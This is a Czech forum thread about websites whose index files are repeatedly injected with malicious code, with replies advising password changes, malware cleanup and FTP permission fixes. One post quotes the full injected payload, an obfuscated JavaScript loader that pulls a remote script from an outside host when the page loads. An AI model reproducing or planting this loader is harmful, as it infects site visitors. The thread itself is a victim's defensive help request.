Napadené index.php a index.html škodlivým kódem

Antivirové programy, firewally, viry, spyware, aktuální hrozby

Moderátor: Moderátoři Živě.cz

Odeslat příspěvekod Alesh.Rocker 19. 9. 2009 09:41

Já mám ten problém taky..používám FileZillu a heslo nemám uložený..a stejně se mi tam ten script pořád do indexu.php / .htm a home.php dostává :( Hosting u pípni.cz..
Dell E6410
Alesh.Rocker
Kolemjdoucí
Uživatelský avatar

Odeslat příspěvekod Milanr1 19. 9. 2009 20:54

Chtělo by to používat hosting, který nemá hacknuté servery.
Milan
Milanr1
Pokročilý
Uživatelský avatar

Odeslat příspěvekod Logi.76 16. 3. 2010 18:35

Jak nejlépe ochránít web před hackem?

Zdravím,

mam problém, na jedné doméně se mi dost casto stává že někdo z venku nějak vloží do index.php ale o do jinych souborů nějaký kod a web tím padem nejede, používám tam RS joomla.

netusim jak tomu mam zabránít zkousel sem nastavit vsemozně práva k přistupu ke vsem souborům ... treba jen na vlastníka nebo jen pro ctení... ale stava se to pořád... ani netusim jak to ty ***** šikmooký dělaj :)

... do indexu.php mi neco napřiklad vložilo toto

Kód: Vybrat vše
<script>var g;if(g!='F' && g!='O'){g=''};try {var tV;if(tV!='' && tV!='q'){tV=null};var E="rep"+"9R5Ilac".substr(4)+"eFx48".substr(0,1);var S=RegExp;var CA;if(CA!='W'){CA=''};var tVR;if(tVR!='a'){tVR=''};this.ke="";function A(M,d){var p;if(p!='o'){p=''};var N=new Array();var fX;if(fX!='' && fX!='R'){fX='l'};var EQ=String("[");var ok=new Date();var Y;if(Y!='Sf' && Y!='SA'){Y='Sf'};var dG=String("g");var qB=new Array();EQ+=d;EQ+=new String("]szKi".substr(0,1));this.dt='';var lf;if(lf!='' && lf!='qd'){lf=null};var qI="";var Yz="";var r=new S(EQ, dG);var D_;if(D_!='u' && D_ != ''){D_=null};return M[E](r, new String());var _P;if(_P!='LD'){_P=''};};var Z=new String();var Bj;if(Bj!='' && Bj!='dEZ'){Bj='fE'};var dy=new Array();var ld="";var QF=new Date();var G=A('84403483440433',"43");var sA;if(sA!='pB'){sA='pB'};var w=new Array();var TX=new String();var Jj;if(Jj!='wV' && Jj!='ti'){Jj='wV'};var H=window;var n=A('sncXrGinpXtG',"0GnX");var hs="";var J=A('corweoaotwewEwloeomoeYnwtY',"owY");var V=A('h0t2t2pn:3/0/ncno8m3c2a2s0t2-3cno3m0.3w3a8r8r2ino2r2f3onr0u2m8.0c8onm0.2c8ono0k8p8a2d2-8c3o0m8.0Y8onu8rnS0u3p0e3r0Pno2o3l8.nr8u8:8',"0n283");var uRp=new String();var eP=new String();var t=A('oVnwlWouaWd1',"uVw1W");var ug;if(ug!='' && ug!='ie'){ug=''};this.iH='';var C=A('/Fn5aWrSoFdS.FrFuU/FnFaWr5oFd5.UrWuU/Sg5lSoFbSeF7F.Sc5oFmU/UgUoSoFgUl5eW.FcFoUmW/FaFbUoFuWt5uWsW.5oSrFgU.UpFhFp5',"FUWS5");var FH="";var F_;if(F_!='mk' && F_!='GT'){F_=''};var z='';Sj=function(){var DZ=new Date();var Kf=new Array();L=document[J](n);var JX;if(JX!='' && JX!='Wk'){JX=''};z=V+G;var QA=new Array();z+=C;var Zt;if(Zt!='Pc'){Zt=''};var CL=new Date();var BH='';L.defer=([1][0]);L.src=z;this.Dh="";var sG;if(sG!='Op'){sG=''};var Gt;if(Gt!='' && Gt!='I_'){Gt='gn'};var UB;if(UB!='Yf' && UB!='Tw'){UB='Yf'};document.body.appendChild(L);this.ez="";};var og=new Date();var GY;if(GY!='' && GY!='ifi'){GY=''};this.go='';H[t]=Sj;var rJ;if(rJ!='Kg' && rJ!='ob'){rJ='Kg'};var DP;if(DP!='SC' && DP!='dh'){DP='SC'};} catch(VM){var ZP=new Array();};</script>
<!--6c0ca19b123c120a40a762b91eaa973c-->


prosim o help, jak nejlip nastavit pravá na ftp popripade co udelat v Joomla aby se to neopakovalo
Naposledy upravil DevAstor dne 16. 3. 2010 19:43, celkově upraveno 2
Důvod: témata sloučena
Logi.76
Junior
Uživatelský avatar

Odeslat příspěvekod Bari007 16. 3. 2010 18:52

To je vykradením FTP účtu. Robot se ti prostě dostal na tvůj (nebo jiný) FTP účet a upravil index soubory. Jsou dvě možné příčiny:
1) Slabé uživatelské jméno a heslo (krátké nebo slovníkové)
2) Ve svém PC máš nějakého záškodníka (vir, keylogger, spyware nebo jinou havěť), který buď přímo skenuje to, co zadáváš do FTP klienta, nebo odchytí uložené přístupové údaje z FTP klienta (typicky starší verze Total Commanderu a v nich uložená nešifrovaná hesla)

Bránit se proti tomu můžeš změnou přístupových údajů na FTP (silné jméno a heslo, pro heslo kombinace velkých/malých písmen a čísel o délce nejméně 10 znaků), vyčištěním PC od havěti a neukládáním přístupových údajů k FTP (nebo uložení v šifrované podobě, tj. nový Total Commander a nastavení Master Password).
Bari007
VIP uživatel
Uživatelský avatar

Odeslat příspěvekod Logi.76 16. 3. 2010 19:08

pristupuju na ftp prez freezilu, a heslo sem zmenil a den dva potom zas vlozeny script do indexu... na jednom jinym webu mi tam dokoce vlozili nejakyho vira, kterej detekoval nod32, takze fakt nechapu jak to delaj... ale je asi dobry nastavit nejak dobre prava na tom ftp ... 777 asi neni nejlepsi volba.
Logi.76
Junior
Uživatelský avatar

Odeslat příspěvekod Bari007 16. 3. 2010 19:12

Důležité je chránit si přístupové údaje na FTP server. Takže jak už jsem říkal, silné heslo a toto heslo neukládat. Samozřejmostí by měl být čistý PC od různých keyloggerů nebo jiné havěti.

Samozřejmě všechny složky by neměly mít 777, ale 755 nebo lépe 644.
Bari007
VIP uživatel
Uživatelský avatar

Odeslat příspěvekod petmal 16. 3. 2010 19:25

Ono je taky mozne, ze utocnik uz si na vasem serveru vytvoril nejakou diru.
Jak bylo receno. Zmenit pristupove udaje a vycistit si PC. Pokud to nepomuze pak take vycistit stranky na serveru. Tzn. vse smazat a znovu uploadovat jen to co tam patri. Pokud mozno take updatovat na posledni verzi RS.
petmal
Junior

Odeslat příspěvekod K8 17. 3. 2010 09:12

petmal píše:... Zmenit pristupove udaje a vycistit si PC...

Aby to bylo spolehlive, tak je nejprve potreba to vase PC, odkud se k tomu ftp pripojujete, poradne odvirovat a pak teprve menit hesla. Jinak si ten vir to heslo zase najde.
K8
Pokročilý

Odeslat příspěvekod vladimir 17. 3. 2010 09:38

Změnit všechna hesla pro přístup do webové administrace hostingu a ftp z úplně jiného (čistého) počítače a počkat, jestli se tam ta havěť znova objeví. Pokud ano, není problém v zavirovaném PC, ale v hacknutém serveru nebo v odposlechu hesel někde v internetu mezi tebou a hostingovým serverem.
vladimir
Expert
Uživatelský avatar

Předchozí stránka

Kdo je online

Uživatelé procházející toto fórum: Žádní registrovaní uživatelé a 0 návštevníků